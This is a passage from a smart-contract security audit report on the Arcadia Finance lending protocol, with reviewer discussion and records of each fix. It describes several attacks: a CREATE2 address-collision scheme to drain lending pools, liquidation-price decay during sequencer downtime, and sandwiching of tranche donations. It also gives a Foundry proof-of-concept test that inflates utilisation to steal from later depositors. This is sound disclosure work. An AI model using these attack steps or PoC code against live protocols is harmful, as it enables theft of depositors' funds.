Recommendation

Either reset assetState[asset].lastRewardGlobal correctly, or, since every action (mint(), burn(), increaseLiquidity(), decreaseLiquidity(), claimReward()) has the effect of withdrawing all the current rewards, change the function _getRewardBalances() to use the amount returned by _getCurrentReward() as the deltaReward directly:

uint256 deltaReward = _getCurrentReward(positionState_.asset);

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: high(1)

Thomas-Smets

Duplicate from #18

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/accounts-v2#170.

IAm0x52

Fix looks good. Since rewards are claimed on all withdrawals and deposits, reward per token can be calculated directly.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue M-2: CREATE2 address collision against an Account will allow complete draining of lending pools

Source: #59

Found by

PUSH0

Summary

The factory function createAccount() creates a new account contract for the user using CREATE2. We show that a meet-in-the-middle attack at finding an address collision against an undeployed account is possible. Furthermore, such an attack allows draining of all funds from the lending pool.

Vulnerability Detail

The attack consists of two parts: Finding a collision, and actually draining the lending pool. We describe both here:

PoC: Finding a collision

Note that in createAccount, CREATE2 salt is user-supplied, and tx.origin is technically also user-supplied:

account = address(
    new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(
        versionInformation[accountVersion].implementation
    )
);
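For reference, the resulting account address follows the standard CREATE2 derivation of EIP-1014; the sketch below is illustrative, with FACTORY, salt and implementation standing in for the Factory address and the createAccount() inputs:

// CREATE2: address = last 20 bytes of keccak256(0xff ++ deployer ++ salt ++ keccak256(initCode)).
// Both sides of the collision search operate on hashes of this form and can be enumerated off-chain.
bytes32 initCodeHash = keccak256(abi.encodePacked(type(Proxy).creationCode, abi.encode(implementation)));
address predicted = address(uint160(uint256(keccak256(abi.encodePacked(
    bytes1(0xff),
    FACTORY,
    keccak256(abi.encodePacked(salt, tx.origin)),
    initCodeHash
)))));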

The address collision an attacker will need to find are:

  • One undeployed Arcadia account address (1).
  • Arbitrary attacker-controlled wallet contract (2).

Both sets of addresses can be brute-force searched because:

  • As shown above, salt is a user-supplied parameter. By brute-forcing many salt values, we have obtained many different (undeployed) wallet accounts for (1).
  • (2) can be searched the same way. The contract just has to be deployed using CREATE2, and the salt is in the attacker's control by definition.

An attacker can find any single address collision between (1) and (2) with high probability of success using the following meet-in-the-middle technique, a classic brute-force-based attack in cryptography:

  • Brute-force a sufficient number of values of salt ($2^{80}$), pre-compute the resulting account addresses, and efficiently store them e.g. in a Bloom filter data structure.
  • Brute-force contract pre-computation to find a collision with any address within the stored set in step 1.

The feasibility, as well as detailed technique and hardware requirements of finding a collision, are sufficiently described in multiple references:

  • 1: A past issue on Sherlock describing this attack.
  • 2: EIP-3607, which rationale is this exact attack. The EIP is in final state.
  • 3: A blog post discussing the cost (money and time) of this exact attack.

The hashrate of the BTC network has reached $6 \times 10^{20}$ hashes per second as of the time of writing, meaning it would take just about $33$ minutes to compute $2^{80}$ hashes. A fraction of this computing power will still easily find a collision in a reasonably short timeline.
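Spelling out that arithmetic: $2^{80} \approx 1.21 \times 10^{24}$ hashes, so at $6 \times 10^{20}$ hashes per second the search takes roughly $1.21 \times 10^{24} / (6 \times 10^{20}) \approx 2015$ seconds, i.e. about $33.6$ minutes.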

PoC: Draining the lending pool

Even given EIP-3607 which disables an EOA if a contract is already deployed on top, we show that it's still possible to drain the lending pool entirely given a contract collision.

Assuming the attacker has already found an address collision against an undeployed account, let's say 0xCOLLIDED. The steps for complete draining of a lending pool are as follow:

First tx:

  • Deploy a contract to 0xCOLLIDED via CREATE2.
  • Have its constructor set token allowances from 0xCOLLIDED to an attacker-controlled wallet for any tokens the attacker plans to drain.
  • selfdestruct the contract within the same transaction (the coded PoC below shows both of these steps are possible).

The attacker now has complete control of any funds sent to 0xCOLLIDED.

Second tx:

  1. Deploy an account to 0xCOLLIDED.
  2. Deposit an asset, collateralize it, then drain the collateral using the allowance set in tx1.
  3. Repeat step 2 for as long as needed (i.e. collateralize the same asset multiple times).
    • The account at 0xCOLLIDED is now infinitely collateralized.
    • Funds for steps 2 and 3 can be obtained through an external flash loan. Simply return the funds when this step is finished.
  4. An infinitely collateralized account has infinite borrow power. Simply borrow all the funds from the lending pool and run away with it, leaving an infinitely collateralized account that actually holds no funds.

The attacker has stolen all funds from the lending pool.

Coded unit-PoC

While we cannot provide an actual hash collision due to infrastructural constraints, we are able to provide a coded PoC to prove the following two properties of the EVM that would enable this attack:

  • A contract can be deployed on top of an address that already had a contract before.
  • By deploying a contract and self-destruct in the same tx, we are able to set allowance for an address that has no bytecode.

Here is the PoC, as well as detailed steps to recreate it:

  1. Paste the following file onto Remix (or a developing environment of choice): https://gist.github.com/midori-fuse/087aa3248da114a0712757348fcce814
  2. Deploy the contract Test.
  3. Run the function Test.test() with a salt of your choice, and record the returned address. The result will be:
    • Test.getAllowance() for that address will return exactly APPROVE_AMOUNT.
    • Test.getCodeSize() for that address will return exactly zero.
    • This proves the second property.
  4. Using the same salt in step 3, run Test.test() again. The tx will go through, and the result will be:
    • Test.test() returns the same address as with the first run.
    • Test.getAllowance() for that address will return twice of APPROVE_AMOUNT.
    • Test.getCodeSize() for that address will still return zero.
    • This proves the first property.
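The pattern these two properties enable can be sketched as follows (a minimal illustration, not the linked gist itself):

// Deployed via CREATE2 so its address is precomputable. The constructor grants an allowance to
// the attacker's wallet and self-destructs within the same transaction, leaving an address with
// no bytecode but a live allowance (selfdestruct still removes code when it runs in the
// transaction that created the contract, even post-Dencun).
interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
}

contract AllowanceSetter {
    constructor(address token, address attackerWallet) {
        IERC20(token).approve(attackerWallet, type(uint256).max);
        selfdestruct(payable(attackerWallet));
    }
}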

The provided PoC has been tested on Remix IDE, on the Remix VM - Mainnet fork environment, as well as testing locally on the Holesky testnet fork, which as of time of writing, has been upgraded with the Dencun hardfork.

Impact

Complete draining of a lending pool if an address collision is found.

With the advancement of computing hardware, the cost of an attack has been shown to be just a few million dollars, and the current Bitcoin network hashrate can perform about $2^{80}$ hashes in about half an hour. The cost of the attack may be offset by a longer brute-force time.

For a DeFi lending pool, it is normal for a pool TVL to reach tens or hundreds of millions in USD value (top protocols' TVL are well above the billions). It is then easy to show that such an attack is massively profitable.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Factory.sol#L96-L100

Tool used

Manual Review, Remix IDE

Recommendation

The mitigation method is to prevent control over the deployed account address (or at least to severely limit it). Some techniques may be:

  • Do not allow a user-supplied salt, as well as do not use the user address as a determining factor for the salt.
  • Use the vanilla contract creation with CREATE, as opposed to CREATE2. The contract's address is determined by msg.sender (the factory), and the internal nonce of the factory (for a contract, this is just "how many other contracts it has deployed" plus one).

This will prevent brute-forcing of one side of the collision, disabling the $O(2^{81})$ search technique.
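A rough sketch of the variant eventually settled on in the discussion below, where the user no longer controls a full-width salt (the salt's original type and the surrounding code are assumptions):

// Only 32 user-chosen bits plus 32 bits derived from tx.origin feed the CREATE2 salt, so an
// attacker can no longer cheaply enumerate ~2^80 candidate account addresses for one side of
// the meet-in-the-middle search.
bytes32 salt_ = keccak256(abi.encodePacked(uint32(uint256(salt)), uint32(uint160(tx.origin))));
account = address(
    new Proxy{ salt: salt_ }(versionInformation[accountVersion].implementation)
);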

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: high(5)

nevillehuang

Request PoC to facilitate discussion between sponsor and watson.

I believe this is low severity given the extreme unlikeliness of it occurring, with the addition that an insanely huge amount of funds is required to perform this attack without guarantee

sherlock-admin

PoC requested from @PUSH0

Requests remaining: 8

midori-fuse

Hello, thanks for asking.

The reason we believe this is a valid HM is the following:

  • The impact is undoubtedly high because a pool can be drained completely.
    • Although only one pool can be drained per collision found, that itself is high impact. Furthermore the protocol will be deployed on several EVM chains, so the attacker can simultaneously drain one pool per chain.
  • We are re-citing a past issue on Sherlock discussing the same root cause of CREATE2 collision, as the issue discussion sufficiently describes:
    • The attack cost at the time of the Kyber contest.
    • The probability of a successful attack was shown to increase to 86% using $2^{81}$ hashes, and 99.96% using twice that power. This is not a low probability by any chance.
      • Furthermore one may also find multiple collisions using this technique, which will allow draining of more than one pool.
  • Hardware advancements can only increase the computing power, not decrease it. Since the Kyber contest, BTC hashrate has already increased significantly (almost doubled), and it has been just 6 months since.
  • The more protocols with this issue there are, the more profit there is to finding a collision.

Therefore the likelihood of this attack can only increase as time passes. Complete draining of a pool also cannot be low severity.

Essentially by identifying this attack, we have proven the existence of a time bomb, that will allow complete draining of a certain pool from any given chain. We understand that past decisions are not considered a source of truth, however the issue discussion and the external resources should still provide an objective reference to determine this issue's validity. Furthermore let's consider the impact if it were to happen as well.

nevillehuang

@Czar102 I am interested in hearing your opinion here with regards to the previous issue here as well.

Thomas-Smets

Don't think it is a high, requires a very big upfront cost with no certainty on pay out as attacker. And while our factory is immutable, we can pause indefinitely the creation of new accounts.

If at some point the attack becomes a possibility, we can still block it.

To make it even harder, we are thinking to add the block.timestamp and block.number to the hash. Then the attacker, after they successfully found a hash collision, already has to execute the attack at a fixed block and probably conspire with the sequencer to ensure that also the time is fixed.

midori-fuse

Agree that it's not a high, the attack cost makes a strong external condition.

Re: mitigations. I don't think pausing the contract or blocking the attack makes sense, the attack would sort of finish in a flash before you know it (and in a shorter duration than a pausing multisig can react).

Regarding the fix, adding block.timestamp and block.number technically works, but doesn't really make sense as opposed to just using the vanilla creation. The main purpose of CREATE2 is that contract addresses are deterministic and pre-computable, you can do a handful of things with this information e.g. funds can be sent there in advance before contract creation, or crafting a customized address without deploying. By adding block number and timestamp, the purpose is essentially defeated.

But since it technically works, there's not really a point in opposing it I suppose. A full fix would involve reworking the account's accounting, which I think is quite complex and may open up more problems.

A fix that would still (partially, but should be sufficient) retain the mentioned functionalities could be just using a uint64 salt, or the last 64 bits of the address only, or anything that doesn't let the user determine more than 64 bits of the input. Then the other side of the brute force has to achieve $2^{15} = 32768$ times the mentioned hashing power in the attack to achieve a sizeable collision probability (and such probability is still less than a balanced $2^{80}$ brute force anyway).

Thomas-Smets

I don't think pausing the contract or blocking the attack makes sense

Meant it in the sense that if such an attack occurs we can pause it, assuming we would not be the first victim. Not that we can frontrun a particular attack with a pause.

Regarding the fix, adding block.timestamp and block.number technically works, but doesn't really make sense as opposed to just using the vanilla creation.

Fair point.

A fix that would still (partially, but should be sufficient) retain the mentioned functionalities could be just using a uint64 salt, or the last 64 bits of the address only, or anything that doesn't let the user determine more than 64 bits of the input.

I do like this idea thanks! We can use 32 bits from the tx.origin and 32 bits from a salt.

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/accounts-v2#176.

IAm0x52

Fix looks good. By using a 32-bit salt, the collision search is increased from 2^81 to 2^128 operations, dramatically increasing the cost.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue M-3: L2 sequencer down will push an auction's price down, causing unfair liquidation prices, and potentially guaranteeing bad debt

Source: #60

Found by

PUSH0, zzykxx

Summary

The protocol implements an L2 sequencer downtime check in the Registry. In the event of sequencer downtime (as well as during a grace period following recovery), liquidations are disabled, and rightly so.

However, while the sequencer is down, any ongoing auctions' price decay is still ongoing. When the sequencer goes back online, it will be possible to liquidate for a much lower price, guaranteeing bad debt past a certain point.

Vulnerability Detail

While the price oracle has sequencer uptime checks, the liquidation auction's price curve calculation does not. The liquidation price is a function with respect to the user's total debt versus their total collateral.

Due to the missing sequencer check within the Liquidator, the liquidation price continues to decay while the sequencer is down. The liquidation price can even drop below 100%; that is, it then becomes possible to liquidate all collateral without repaying all debt.

Any ongoing liquidations that are temporarily blocked by a sequencer outage will continue to experience price decay. When the sequencer goes back online, the auction price will have dropped significantly, causing the liquidation to happen at an unfair price as well. Furthermore, longer downtime durations will make it possible to seize all collateral for less than $100\%$ of the debt, guaranteeing bad debt for the protocol.

Proof of concept

We use the default liquidator parameters defined in the constructor for our example:

  • Starting multiplier is 150%.
  • Final multiplier is 60%.
  • Half-life duration is 1 hour.
  • Cutoff time is irrelevant.

Consider the following scenario:

  1. Bob's account becomes liquidatable. Someone triggers liquidation start.
  2. Anyone can now buy $100\%$ of Bob's collateral for the price of $150\%$ of Bob's debt. However, this is not profitable yet, so everyone waits for the price to drop a bit more.
  3. After 30 minutes, auction price is now $60\% + 90\% * 0.5^{0.5} = 123.63\%$ of Bob's debt for $100\%$ collateral. Market price hasn't moved much, so this is still not profitable yet.
  4. Sequencer goes down for one hour, not counting the grace period. Note that Arbitrum's sequencer has experienced multiple outages of this duration in the past. In 2022, there was an outage of approximately seven hours. There was also a 78-minute outage in December 2023.
  5. When the sequencer goes up, the auction has been going on for 1.5 hours, or 1.5 half-lives. Auction price is now $60\% + 90\% * 0.5^{1.5} = 91.82\%$.
  6. Liquidation is now profitable. All of Bob's collaterals are liquidated, but the buyer only has to repay $91.82\%$ of Bob's debt. Bob is left with $0$ collateral but positive debt (specifically, $8.18\%$ of his original debt).

The impact becomes more severe the longer the sequencer goes down. In addition, the grace period on top of it will decay the auction price even further, before the auction can be back online.

  • In the above scenario, if the sequencer outage plus grace period is $2$ hours, then the repaid debt percentage is only $60\% + 90\% * 0.5^{2.5} = 75.91\%$

Furthermore, even if downtime is not enough to bring down the multiplier to less than $100\%$, Bob will still incur unfair loss due to his collateral being sold at a lower price anyway. Therefore any duration of sequencer downtime will cause an unfair loss.
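For reference, the multipliers quoted above follow the auction's exponential decay: with the default parameters the price multiplier after $t$ hours is $P(t) = 60\% + (150\% - 60\%) \cdot 0.5^{t}$, giving $P(0.5) \approx 123.6\%$, $P(1.5) \approx 91.8\%$ and $P(2.5) \approx 75.9\%$ as used in the scenario.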

Impact

Any ongoing liquidations during a sequencer outage event will execute at a lower debt-to-collateral ratio, potentially guaranteeing bad debt and/or user being liquidated for a lower price.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/Liquidator.sol#L364-L395

Tool used

Manual Review

Recommendation

Auctions' price curve should either check and exclude sequencer downtime alongside its grace period, or said auctions should simply be voided.
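A minimal sketch of the first option, using hypothetical names (the actual Registry and Liquidator interfaces differ):

// Hedged sketch: revert bids until the sequencer's grace period has passed, and shift the
// auction start time so the price multiplier does not decay during the outage. All identifiers
// here are illustrative.
error SequencerDown();

function _syncAuctionStart(uint32 startTime, uint256 gracePeriodEnd) internal view returns (uint32) {
    if (block.timestamp < gracePeriodEnd) revert SequencerDown();
    // Auctions that started before the outage restart their price curve at the end of the grace period.
    return startTime < gracePeriodEnd ? uint32(gracePeriodEnd) : startTime;
}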

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

invalid

nevillehuang

Since it was mentioned in the contest details as the following, I believe the exception highlighted in point 20. of sherlock rules applies here, so leaving as medium severity.

Chainlink and contracts of primary assets are TRUSTED, others are RESTRICTED

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/lending-v2#136.

IAm0x52

Fix looks good. Bids made during sequencer downtime revert and all auctions automatically refresh auction starting time.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue M-4: Utilisation Can Be Manipulated Far Above 100%

Source: #93

Found by

Bandit, zzykxx

Summary

The utilisation of the protocol can be manipulated far above 100% via token donation. It is easiest to set this up on an empty pool. This can be used to manipulate the interest to above 10000% per minute to steal from future depositors.

Vulnerability Detail

This attack is inspired by / taken from this bug report for Silo Finance. I recommend reading it, as it is very well written: https://medium.com/immunefi/silo-finance-logic-error-bugfix-review-35de29bd934a

The utilisation is basically assets_borrowed / assets_loaned. A higher utilisation creates a higher interest rate, and it is assumed to be less than 100%. However, if it exceeds 100%, there is no cap here:

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L809-L817

Normally, assets borrowed should never exceed assets loaned. However, this is possible in Arcadia, as the only thing stopping a borrow from exceeding the loans is that the transfer of tokens will revert due to there not being enough tokens in the LendingPool. An attacker can make it not revert by simply sending tokens directly into the lending pool, for example using the following sequence:

  1. deposit 100 assets into tranche
  2. Use ERC20 Transfer to transfer 1e18 assets into the LendingPool
  3. Borrow the 1e18 assets
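With those numbers, the utilisation that feeds the interest-rate calculation is roughly $u = \text{assets borrowed} / \text{assets loaned} = 10^{18} / 100 = 10^{16}$, i.e. about $10^{18}\%$, far outside the sub-100% range the rate curve assumes.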

These are the first steps of the coded POC at the bottom of this issue. It uses a token donation to make a borrow which is far larger than the loan amount.

In the utilisation calculation, this results in an incredibly high utilisation rate and thus interest rate, as it is not capped at 100%. This is why some protocols implement a hard cap on utilisation at 100%.

The interest rate is so high that over 2 minutes, 100 assets grow to over 100,000 assets, or roughly 100,000% interest over 2 minutes. The similar exploit linked above on Silo Finance has an even more drastic interest manipulation, which could drain the whole protocol in a block. However, I did not optimise the numbers for this POC.

Note that the 1e18 assets "donated" to the protocol are not lost. They can simply all be borrowed back into the attacker's account.

The attacker can set this up when the initial lending pool is empty. Then, they can steal assets from subsequent depositors due to the huge amount of interest collected on their small initial deposit.

Let me sum up the attack in the POC:

  1. deposit 100 assets into tranche
  2. Use ERC20 Transfer to transfer 1e18 assets into the LendingPool
  3. Borrow the 1e18 assets
  4. Victim deposits into tranche
  5. Attacker withdraws the victim's funds, which are greater than the 100 assets the attacker initially deposited

Here is the output from the console.logs:

Running 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test
[PASS] testScenario_Poc() (gas: 799155)
Logs:
  100 initial pool balance. This is also the amount deposited into tranche
  warp 2 minutes into future
  mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack
  22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!

This is the edited version of setUp() in _scenario.t.sol

function setUp() public virtual override(Fuzz_Lending_Test) {
        Fuzz_Lending_Test.setUp();
        deployArcadiaLendingWithAccounts();

        vm.prank(users.creatorAddress);
        pool.addTranche(address(tranche), 50);

        // Deposit funds in the pool.
        deal(address(mockERC20.stable1), users.liquidityProvider, type(uint128).max, true);

        vm.startPrank(users.liquidityProvider);
        mockERC20.stable1.approve(address(pool), 100);
        // only 100 assets are deposited by the liquidity provider
        tranche.mint(100, users.liquidityProvider);
        vm.stopPrank();

        vm.startPrank(users.creatorAddress);
        pool.setAccountVersion(1, true);
        pool.setInterestParameters(
            Constants.interestRate, Constants.interestRate, Constants.interestRate, Constants.utilisationThreshold
        );
        vm.stopPrank();

        vm.prank(users.accountOwner);
        proxyAccount.openMarginAccount(address(pool));
    }

This test was added to BorrowAndRepay.scenario.t.sol

    function testScenario_Poc() public {

        uint poolBalance = mockERC20.stable1.balanceOf(address(pool));
        console.log(poolBalance, "initial pool balance. This is also the amount deposited into tranche");
        vm.startPrank(users.liquidityProvider);
        mockERC20.stable1.approve(address(pool), 1e18);
        mockERC20.stable1.transfer(address(pool),1e18);
        vm.stopPrank();

        // Given: collateralValue is smaller than maxExposure.
        //amount token up to max
        uint112 amountToken = 1e30;
        uint128 amountCredit = 1e10;

        //get the collateral factor
        uint16 collFactor_ = Constants.tokenToStableCollFactor;
        uint256 valueOfOneToken = (Constants.WAD * rates.token1ToUsd) / 10 ** Constants.tokenOracleDecimals;

        //deposits token1 into proxyAccount
        depositTokenInAccount(proxyAccount, mockERC20.token1, amountToken);

        uint256 maxCredit = (
            //amount credit is capped based on amount Token
            (valueOfOneToken * amountToken) / 10 ** Constants.tokenDecimals * collFactor_ / AssetValuationLib.ONE_4
                / 10 ** (18 - Constants.stableDecimals)
        );


        vm.startPrank(users.accountOwner);
        //borrow the amountCredit to the proxy account
        pool.borrow(amountCredit, address(proxyAccount), users.accountOwner, emptyBytes3);
        vm.stopPrank();

        assertEq(mockERC20.stable1.balanceOf(users.accountOwner), amountCredit);

        //warp 2 minutes into the future.
        vm.roll(block.number + 10);
        vm.warp(block.timestamp + 120);

        console.log("warp 2 minutes into future");

        address victim = address(123);
        deal(address(mockERC20.stable1), victim, type(uint128).max, true);

        vm.startPrank(victim);
        mockERC20.stable1.approve(address(pool), type(uint128).max);
        uint shares = tranche.mint(1e3, victim);
        vm.stopPrank();

        console.log("mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack");

        //function withdraw(uint256 assets, address receiver, address owner_)

        //WITHDRAWN 1e5
        vm.startPrank(users.liquidityProvider);
        uint withdrawShares = tranche.withdraw(1e5, users.liquidityProvider,users.liquidityProvider);
        vm.stopPrank();

        console.log(withdrawShares, "shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!");


    }

Impact

An early depositor can steal funds from future depositors through utilisation/interest rate manipulation.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L809-L817

Tool used

Manual Review

Recommendation

Add a utilisation cap of 100%. Many other lending protocols implement this mitigation.
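A rough sketch of such a cap (variable names are illustrative, not the pool's actual storage layout):

// Clamp utilisation at 100% (here ONE_4 = 10_000, i.e. 100% in 4-decimal fixed point) before it
// is fed into the interest-rate curve.
uint256 utilisation = totalLiquidity == 0 ? 0 : (totalDebt * ONE_4) / totalLiquidity;
if (utilisation > ONE_4) utilisation = ONE_4;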

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: utilization should be mitigated; high(6)

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/lending-v2#137.

sherlock-admin2

This should be high as it can steal both the first subsequent deposit and all future deposits after that. The original linked issue for Silo Finance was Critical although Silo had multiple simultaneous pools. The interest rate formula for both Silo and Arcadia are the same, but that POC was more optimised which shows a faster rate of massive interest accrual.

You've deleted an escalation for this issue.

nevillehuang

Hi @Banditx0x I believe the following factors mentioned by @zzykxx in his report warrants the decrease in severity:

  • The interest rate is capped at 2^80 (~= 10^24) because of the downcasting in LendingPool::_calculateInterestRate(). The maximum interest is about 100% every 20 days.
  • The tokens sent directly to the pool by the griefer are effectively lost and can be transferred to the treasury.
  • The virtual shares implementation in the tranches might prevent the attacker from collecting all of the interest.

Sponsors Comments:

impact is only possible in quasi empty pools, and cost for doing it is largely in line with the damage done. In the example of 93, only 100 assets are in the pool, 1e18 are donated by the attacker → only the user borrowing the 100 assets is affected, so in this case of an empty pool, not a lot, and even more, the 1e18 can indeed be borrowed by the attacker, but he’ll be liquidated and incur a loss himself: he is the one paying the interest he jacked up (even if only >100 is recovered through liquidations, the LP actually profits, since the penalty is paid on a larger amount than what the “good” lp borrowed out). → low probability, cost is high → medium at most

zzykxx

Hey @Banditx0x, correct me if I'm wrong, but I think the following applies here:

  • In the Silo finance exploit depositing assets in a pool allowed to use the shares of the said pool to borrow other assets. An attacker could deposit a small amount, borrow his own donation (increasing the utilization rate), which had the effect of increasing the value of his initial donation. Then he could use the initial donation, which is now extremely overvalued, as collateral to borrow assets and steal funds. This is not possible here because the shares of a lending pool cannot be used as collateral to borrow assets.
  • Unlike the Silo finance case, the maximum interest rate achievable is capped at uint80 =~ 10^24.
  • To steal a sensible amount of funds the attacker should first deposit more than "100" assets. But by depositing more than "100" assets the required amount to donate to achieve maximum utilization manipulation also increases. You could argue this is not the case and more time just needs to pass, but if anybody in the meantime deposits extra funds in the tranche and/or calls updateInterestRate() the interest rate will diminish the speed at which it increases.
  • The attacker, which as you said can borrow his own donation, also has to pay interest on it.
  • In your POC the virtual shares are not taken into account. As we know virtual shares cause a loss to the first depositor, this depends on the amount of decimals and the value of the underlying and also by how much the virtual share is set at.

Some damage can be caused by abusing this issue, but I think the damage is not big enough to classify this as high severity. Of course, I would be more than happy to be proven wrong since this would also be in my personal interest.

Banditx0x

@zzykxx thanks for the response. You're right that the Silo finance situation had much higher impact due to manipulation of one asset allowing borrows of another. However I had originally thought that the impact would be High even with this in mind as it had the same impact as the share inflation attack which historically has had high severity.

I hadn't realised the maximum interest rate was capped at uint80, which indeed caps the interest rate to far lower than the issue I had linked.

Given the slower interest rate accrual than I originally thought, I agree with the medium severity.

Edit: i deleted past escalation comment due to this discussion. Just so this conversation makes sense for future readers.

Czar102

Planning to reject the escalation and leave the issue as is.

Czar102

Result: Medium Has duplicates

midori-fuse

Wasn't the escalation deleted before the period end?

Banditx0x's comment was last edited on 5:26AM UTC, while the escalation period end was 12:36PM same day.

Czar102

@midori-fuse It looks so, we will look into it. Thank you for bringing this up!

Czar102

The escalation should have been deleted, there was an issue on Sherlock's part that's now resolved.

IAm0x52

Fix looks good. Utilization is now capped at 100%

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue M-5: Dilution of Donations in Tranche

Source: #121

The protocol has acknowledged this issue.

Found by

Atharv, erosjohn, pash0k

Summary

In this attack, the attacker takes advantage of the non-atomic nature of the donation and the share valuation process. By strategically placing deposit and withdrawal transactions around the donation transaction, the attacker can temporarily inflate their share of the pool to capture a large portion of the donated funds, which they then quickly exit with, walking away with their original investment plus extra value extracted from the donation.

Vulnerability Detail

Though there is no reasonable flow where users will just 'donate' assets to others, the Risk Manager may need to call donateToTranche to compensate the jrTranche after an auction didn't get sold and was manually liquidated after the cutoff time, or in case of bad debt.

The donateToTranche function of the lending pool smart contract allows for a sandwich attack that can be exploited by a malicious actor to dilute the impact of donations made to a specific tranche. This attack involves front-running a detected donation transaction with a large deposit and following it up with an immediate withdrawal after the donation is processed.

The lending pool contract in question allows liquidity providers (LPs) to deposit funds into tranches, which represent slices of the pool's capital with varying risk profiles. The donateToTranche function permits external parties to donate assets to a tranche, thereby increasing the value of the tranche's shares and benefiting all LPs proportionally. Transactions can be observed by one of the LPs before they are mined. An attacker can exploit this by identifying a pending donation transaction and executing a sandwich attack. This attack results in the dilution of the donation's intended effect, as the attacker's actions siphon off a portion of the donated funds.

Impact

Dilution of Donation: The intended impact of the donation on the original LPs is diluted as the attacker siphons off a portion of the donated funds.

Steps to Reproduce Issue

  1. Front-Running: The attacker deposits a significant amount of assets into the target tranche before the donation transaction is confirmed, temporarily increasing their share of the tranche.

  2. Donation Processing: The original donation transaction is processed, increasing the value of the tranche's shares, including those recently acquired by the attacker.

  3. Back-Running: The attacker immediately withdraws their total balance from the tranche, which now includes a portion of the donated assets, effectively extracting value from the donation meant for the original LPs.
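The attacker's capture can be quantified: if honest LPs hold $S$ shares and the attacker mints $S_a$ shares just before a donation of $D$ assets, the attacker's immediate withdrawal claims roughly $D \cdot S_a / (S + S_a)$ of the donation, leaving only $D \cdot S / (S + S_a)$ for the LPs the donation was meant to compensate.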

Code Snippet

Code Snippet

Coded PoC

https://github.com/Atharv181/Arcadia-POC
- git clone https://github.com/Atharv181/Arcadia-POC
- cd Arcadia-POC
- forge install
- forge test --mt test_PoC -vvv

Tool used

Manual Review, Foundry

Recommendation

  • Snapshot Mechanism: Take snapshots of share ownership at random intervals and distribute donations based on the snapshot to prevent exploitation.
  • Timelocks: Implement a timelock mechanism that requires funds to be locked for a certain period before they can be withdrawn.
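A minimal sketch of the timelock idea applied to the tranche (illustrative only; as the sponsor notes in the discussion below, the Tranche's existing locking mechanisms would make a production version more involved):

// Record the last deposit per owner and refuse withdrawals until a delay has passed, so a
// depositor cannot enter right before a donation and exit right after it.
mapping(address => uint256) internal lastDepositTimestamp;
uint256 internal constant WITHDRAW_DELAY = 1 days;

function _afterDeposit(address receiver) internal {
    lastDepositTimestamp[receiver] = block.timestamp;
}

function _beforeWithdraw(address owner_) internal view {
    require(block.timestamp >= lastDepositTimestamp[owner_] + WITHDRAW_DELAY, "TRANCHE: withdrawal locked");
}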

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

invalid

nevillehuang

Low severity. A combination of front-running and back-running is not possible on Base, Optimism and Arbitrum due to private sequencers. Other chains were not explicitly mentioned, or at least all the issues and the duplicates do not present a possible chain where a sandwich attack is possible.

zzykxx

Escalate

I'm escalating this on behalf of @pa-sh0k because I believe his claims should be considered via a proper escalation. This is what he states:

The loss of funds can be caused not only if the attacker executes an atomic sandwich attack, but also if they do the following steps:

  1. backrun the liquidation that ended up in transferring collateral to the admin, since this always leads to the donateToTranche call, and then deposit to the tranche
  2. backrun the donation itself and redeem their shares, obtaining profit

Hence, the reason for invalidation is incorrect.

Also, the sponsor has acknowledged the issue in discord channel.

By Sherlock’s rules, this issue is a medium, it suits the following criteria: “Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The losses must exceed small, finite amount of funds, and any amount relevant based on the precision or significance of the loss”.

sherlock-admin2

Escalate

I'm escalating this on behalf of @pa-sh0k because I believe his claims should be considered via a proper escalation. This is what he states:

The loss of funds can be caused not only if the attacker executes an atomic sandwich attack, but also if they do the following steps:

  1. backrun the liquidation that ended up in transferring collateral to the admin, since this always leads to the donateToTranche call, and then deposit to the tranche
  2. backrun the donation itself and redeem their shares, obtaining profit

Hence, the reason for invalidation is incorrect.

Also, the sponsor has acknowledged the issue in discord channel.

By Sherlock’s rules, this issue is a medium, it suits the following criteria: “Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The losses must exceed small, finite amount of funds, and any amount relevant based on the precision or significance of the loss”.

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

Thomas-Smets

If such a backrun would happen, the admin would just not donate via donateToTranche.

The auction proceeds would in this case be donated via different means (it is already the unhappy flow of an unhappy flow where things have to be handled manually). A bit annoying, but no loss of user funds.

So the attacker runs the risk of having to provide liquidity in the Tranche for an unknown amount of time, without any certainty of profits at all.

pa-sh0k

Detecting the backrun and getting the funds back to the depositors via different means is indeed a solution to the problem. However, it does not make the problem itself invalid or non-existent: there may be different solutions and all of them, of course, should lead to no loss of user funds.

The issue still exists and it can be prevented using the described method only if it was known beforehand, but it was not stated in the known issues or anywhere else.

